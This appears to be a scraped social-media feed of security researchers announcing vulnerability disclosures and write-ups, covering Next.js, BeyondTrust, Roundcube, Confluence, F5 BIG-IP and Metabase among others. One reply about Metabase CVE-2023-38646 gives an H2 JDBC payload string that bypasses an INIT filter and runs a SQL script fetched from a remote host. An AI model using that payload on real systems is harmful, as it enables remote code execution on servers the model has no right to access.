HTTPVoid retweeted
Our team discovered a critical remote code execution vulnerability in Next.js. If you self-host Next.js, update immediately. Vercel managed Next.js hosts are safe! We’ll publish the technical details and proof of concept soon!
20
66
479
108,677
HTTPVoid retweeted
🚨 CVE-2026-1731 🚨 Our team discovered a critical pre-auth RCE affecting BeyondTrust Remote Support & Privileged Remote Access. SaaS/Cloud instances have been patched. If you're running self-hosted deployments, apply the patches immediately. More info in the comments.
3
63
242
36,080
HTTPVoid retweeted
My research on CVE-2025-49113 is out. fearsoff.org/research/roundc…. Happy reading! #CVE #roundcube #poc @FearsOff
7
96
333
33,229
CVE-2025-49113 is a fascinating PHP Object injection in Roundcube webmail, a really nice find by the original finder. #roundcube #cve-2025-49113 #rce
1
14
61
5,922
New from us! Testing a Rails + Nginx app? This should be in your checklist. Read the blog to know how we disclosed Discourse database backups!
New Blogpost - We identified a vulnerability in Discourse where a misconfiguration in Rails send_file + Nginx's internal directive can expose database backups! projectdiscovery.io/blog/dis… This issue isn't limited to Discourse. It can affect other Rails + Nginx apps with similar configurations. Read our full analysis and detect it with our Nuclei template, now live on ProjectDiscovery Cloud!
1
13
2,000
HTTPVoid retweeted
I just published a new blog post sharing an improved Deserialization Gadget Chain for Ruby! It builds on the work of others, including Leonardo Giovanni, Peter Stöckli @GHSecurityLab and @wcbowling nastystereo.com/security/rub…
2
61
202
26,142
Checkout our new blogpost! In this post we talk about SAML and the recent Ruby-SAML Auth bypass. CVE-2024-45409: Ruby-SAML Auth Bypass in GitLab blog.projectdiscovery.io/rub…
3
147
545
40,196
HTTPVoid retweeted
My colleague @hash_kitten and I discovered a full-read SSRF vulnerability in Next.js (CVE-2024-34351). We published our research today on @assetnote's blog: assetnote.io/resources/resea…. Thank you to the Vercel team for a smooth disclosure process.
16
181
776
95,660
HTTPVoid retweeted
Check out my write-up on a seemingly harmless and limited send() in GitHub (CVE-2024-0200) and how it could be used to obtain environment variables from a production container and to achieve remote code execution in GitHub Enterprise Server: starlabs.sg/blog/2024/04-sen…
5
82
240
40,226
Enjoy our next blog post this time an SQL Injection on Apple’s Infra. Another win nets us a $25,000 bounty! 💻💰 #AppleSecurity #Research #bugbountytips #bugbounty blog.projectdiscovery.io/hac…
Check out our latest research blog, including detailed overview of how we discovered an SQL injection vulnerability (+ nuclei template) in Masa/Mura CMS and Hacked into Apple's Infrastructure. blog.projectdiscovery.io/hac… #AppleSecurity #Research #CyberSecuirty #BugBounty
33
181
16,832
Check out our new blog post! We hacked into Apple Travel Portal (yes, again!) using a 0-day Remote Code Execution exploit. Part 1 is live now, stay tuned for the follow-up on another RCE worth a total bounty of $40k! blog.projectdiscovery.io/hel…
4
110
351
44,586
As the PoC is almost out, we are now publishing our analysis.
🚀 Just released our in-depth analysis of CVE-2023-22527, a critical RCE vulnerability in Atlassian Confluence Data Center & Server. 🛡️ Don't miss out on our findings and learn how to detect and protect your systems! 🔍 blog.projectdiscovery.io/atl… #cybersecurity #CVE #RCE #Atlassian #Confluence
1
19
3,290
Hello OgnlGuard/isSafeExpression, we meet again 🤝 🥲 Confluence OGNL Injection.
1
6
59
9,969
Reproduced the CVE-2023-46747 F5 Big-IP RCE via AJP smuggling. Props to @praetorianlabs for identifying this cool bug. @pdnuclei template dropping soon. Time to sleep😴 #f5-rce #CVE-2023-46747
Reproduced the AJP request Smuggling to access /tmui/* resources directly. Very interesting bug indeed, need to further look into post-exploitation. Until next time😴
1
37
163
27,901
Reproduced the AJP request Smuggling to access /tmui/* resources directly. Very interesting bug indeed, need to further look into post-exploitation. Until next time😴
F5 BIGIP is vulnerable to a smuggling request vulnerability that an attacker can exploit to achieve unauthorized RCE. Our vulnerability research team responsibly disclose this to F5, which released a hotfix today. hubs.ly/Q026ThPw0 #vulnerabilityresearch #f5 #cve
10
78
39,537
HTTPVoid retweeted
HTTP Request Splitting vulnerabilities exploitation offzone.moscow/upload/iblock…
8
209
718
79,955
HTTPVoid retweeted
Here is the #exploit that targets the "VMWare Aria Operations for Networks" which has CVSS 9.8 and targets all the versions from 6.0 to 6.10 (CVE-2023-34039) 🔥 I just wrote the exploit, but the discovery credit is for @rootxharsh and @iamnoooob 👏 github.com/sinsinology/CVE-2…
35
78
14,165
Plenty of ways to RCE, another way to bypass the INIT key block for the h2 engine is using an escape character: mem:;\INIT=RUNSCRIPT FROM 'htttp://rce/poc.sql'//\; Great find!
The security research team at @assetnote found and reported a critical pre-auth RCE vulnerability to Metabase earlier this month CVE-2023-38646: blog.assetnote.io/2023/07/22… This one was an incredibly fun discovery as there are many roads to RCE through JDBC. We've published details of the original discovery at our blog:
2
8
62
11,647
The Metabase pre-auth RCE is interesting. While the entry point is straightforward, the process of exploitation is fun. We suspect we might have exploited this in an unintended way. We'll wait for @assetnote's blog, based on that we may or may not publish our analysis.
1
3
80
11,592